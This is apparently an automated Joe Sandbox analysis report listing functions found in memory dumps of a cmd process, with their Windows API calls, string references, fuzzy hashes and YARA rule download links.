Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 5c373604d79d419ba86386709485eba59e34204454e8dab459a06c6cd13bd43c
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 14016D21704B94D6EB10DB52A85CB5963A1FBD8FC0F584236AF8D47794DE3CC5A6CB80

Function 0000022123C21A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000022123C21A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000022123C21A74
PathFindFileNameW.SHLWAPI ref: 0000022123C21A83
lstrlenW.KERNEL32 ref: 0000022123C21A8F
StrCpyW.SHLWAPI ref: 0000022123C21AA2
CloseHandle.KERNEL32 ref: 0000022123C21AB0

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 930071b39a0231c656bb89b4fe9c2dfd4a05fb2f35cdcc5a5e2cd0b5d6f7c921
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 14018061700B54D2EB10DB52A89CB9963A1F798FC0F484236EE8D47754DE3DC6E6C780

Function 0000022123C53E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022123C53AAC), ref: 0000022123C53E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C53AAC), ref: 0000022123C53E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C53AAC), ref: 0000022123C53E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C53AAC), ref: 0000022123C53E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C53AAC), ref: 0000022123C53E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000022123C53AAC), ref: 0000022123C53EAE

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: b1190c3988e03ec657cd66d90bb3e6e37034aa0de85ecbc695cdfa923d6b9097
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 44016175211B58D6FB249BA1F44DB1533A4BBA4B41F141226EE4D0A394EF3DC0B9CB40

Function 0000022123C23E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022123C23AAC), ref: 0000022123C23E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C23AAC), ref: 0000022123C23E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C23AAC), ref: 0000022123C23E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C23AAC), ref: 0000022123C23E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C23AAC), ref: 0000022123C23E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000022123C23AAC), ref: 0000022123C23EAE

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 47a1ce68920da32055878b979965a78b72bc32af9a8063e92c5c6cbb564246d8
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: C3012D75611758D2FB249BA1E88CB5573A0FB65B45F141226EE8D0A3A4EF3EC1B8C700

Function 0000022123C51AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000022123C51AF4
StrCmpNIW.SHLWAPI ref: 0000022123C51B0E
lstrlenW.KERNEL32 ref: 0000022123C51B1D
StrCpyW.SHLWAPI ref: 0000022123C51B32

Strings

\\?\, xrefs: 0000022123C51B02

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: a715ab7b1f4fe9ca9acfde32bfaf718bfbab6e83829d4fbb60ea9b8ee0979815
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: D5F0A462304698E2EB208B60F48CB597360F7A4B88F845122EF494A694DE6CC6F9CB00

Function 0000022123C21AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000022123C21AF4
StrCmpNIW.SHLWAPI ref: 0000022123C21B0E
lstrlenW.KERNEL32 ref: 0000022123C21B1D
StrCpyW.SHLWAPI ref: 0000022123C21B32

Strings

\\?\, xrefs: 0000022123C21B02

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 68e9dade5f0c3ff5586d399fac7513c514027ac90211d51375e5aed64b294aef
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 16F0A462304698E2E7208B60F588B596360F764B88F845122FE4D4A654DF6DC7F9CB00

Function 0000022123C5B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000022123C5B929
GetProcAddress.KERNEL32 ref: 0000022123C5B93F
FreeLibrary.KERNEL32 ref: 0000022123C5B95B

Strings

CorExitProcess, xrefs: 0000022123C5B938
mscoree.dll, xrefs: 0000022123C5B920

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 44751e2a88d96281b7c2ee61c5723a867c5011632ae6b1efcd4297db65e00a60
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: D4F09671210A19E5EA109B94A848B595730EBD5760F54231BEE6A4D1F5CF3CD4F8DB00

Function 0000022123C53708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000022123C5275A), ref: 0000022123C5372A
StrCpyW.SHLWAPI ref: 0000022123C5373A
StrCatW.SHLWAPI ref: 0000022123C53746
PathCombineW.SHLWAPI(?,?,00000000,0000022123C5275A), ref: 0000022123C53754

Strings

\\.\pipe\, xrefs: 0000022123C53720

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: c3d980f41249f90e54bb462fe4965b79cd909127bd6bcd1665a777ee598deb29
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: A4F08954704BA8D2EA144B93B9185156250BBE8FC0F54A232FE060B755DE2CD4B59B00

Function 0000022123C2B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000022123C2B929
GetProcAddress.KERNEL32 ref: 0000022123C2B93F
FreeLibrary.KERNEL32 ref: 0000022123C2B95B

Strings

CorExitProcess, xrefs: 0000022123C2B938
mscoree.dll, xrefs: 0000022123C2B920

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 761139f44c4ff2d79f73a82b003a6e6e732419ca125cedb3d9981f408e313687
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 71F09621210619E1EB109BA49888B591330EB95760F54231BEE694D1E4CF3DC5F8C700

Function 0000022123C23708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000022123C2275A), ref: 0000022123C2372A
StrCpyW.SHLWAPI ref: 0000022123C2373A
StrCatW.SHLWAPI ref: 0000022123C23746
PathCombineW.SHLWAPI(?,?,00000000,0000022123C2275A), ref: 0000022123C23754

Strings

\\.\pipe\, xrefs: 0000022123C23720

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: a93b3ea8741a265a44fdd670d50b5f6bf5fd7e7004f2ef75fbb0f3abcd052010
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: EFF08954304BA8D1EE445B93F9185595250F758FC0F44A232FD0A0B714CE2CC5F58700

Function 0000022123C55810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022123C55896

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 6cf4aa5bbb2247c16876fc34b0b99f3c33a18fa81ad892ddc25f2b57033300ad
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: B802CB32219B98D6E760CB55F49875AB7A0F3D4794F101116FA8E9BBA8DF7CC4A4CB00

Function 0000022123C25810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022123C25896

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: ad426fab226c1b53a3d60562e30b21cfa8248f2891e77404163c796a205cb20f
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 7E02E932219B98C6E760CB59F49475AB7A0F3D4794F105116FA8E8BBA8DF7CC4A4CB00

Function 0000022123C52C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000022123C52CAD
TlsGetValue.KERNEL32 ref: 0000022123C52CBC
TlsGetValue.KERNEL32 ref: 0000022123C52CCB
TlsSetValue.KERNEL32 ref: 0000022123C52E0F
TlsSetValue.KERNEL32 ref: 0000022123C52E1E
TlsSetValue.KERNEL32 ref: 0000022123C52E2D

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 44ffd595d88ff7a75a0bb6ad33afb153ef3502fb8302d1fa1d29ddad59a28496
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: F351C531314624E7E325CB95B448E59B3E4F7A8B80F10521ABE465B798DF38D8B6CB00

Function 0000022123C22C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000022123C22CAD
TlsGetValue.KERNEL32 ref: 0000022123C22CBC
TlsGetValue.KERNEL32 ref: 0000022123C22CCB
TlsSetValue.KERNEL32 ref: 0000022123C22E0F
TlsSetValue.KERNEL32 ref: 0000022123C22E1E
TlsSetValue.KERNEL32 ref: 0000022123C22E2D

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 2287c7ad7018b87e3b4c79d9bc225223f95fde017d8487c4ab17bffd66a7d6d2
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 2A51E735314624E7E3A4CB56E848E59B3A0F7A8B80F50521AFE4E4B758DF38C9B5C740

Function 0000022123C52AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000022123C52AE1
TlsGetValue.KERNEL32 ref: 0000022123C52AF0
TlsGetValue.KERNEL32 ref: 0000022123C52AFF
TlsSetValue.KERNEL32 ref: 0000022123C52C3B
TlsSetValue.KERNEL32 ref: 0000022123C52C4A
TlsSetValue.KERNEL32 ref: 0000022123C52C59

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 23c1d293e91fa10a61ed833b2e3de4f1129796586c64c71235282e8c018b65fc
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 14519531324625E7E724CF95B448E1973A4F3A4B80F50521AEE4A5B798DF39D8B6CB00

Function 0000022123C22AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000022123C22AE1
TlsGetValue.KERNEL32 ref: 0000022123C22AF0
TlsGetValue.KERNEL32 ref: 0000022123C22AFF
TlsSetValue.KERNEL32 ref: 0000022123C22C3B
TlsSetValue.KERNEL32 ref: 0000022123C22C4A
TlsSetValue.KERNEL32 ref: 0000022123C22C59

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: ee777a56378842760daac4657f3471583226edb180d53617f98a4e2ed4c537d3
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: DD51A635224665E7E764CF56A848E1973A0F3A8B80F40521AFE4E47758DF39C9B5CB00

Function 0000022123C55E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022123C55E66

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: ef7eac4e65b2b9703853e410d6bb15d853af9b1e659d57d48d61be31903dffa4
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: D461DE36128658D6E760CB55F44871AB7A4F398754F102216FE8E9BBE4DB7CC5B0CB04

Function 0000022123C25E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022123C25E66

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 3995d7bf18514781843c9ef5b0086f90b18edc85b410a4f92774cd8d7ab136b3
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 6A61E036129B58D6E760CB95E45871AB7A0F398758F102216FE8D4BBA8DB7CC5B0CF04

Function 0000022123C53EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F2E
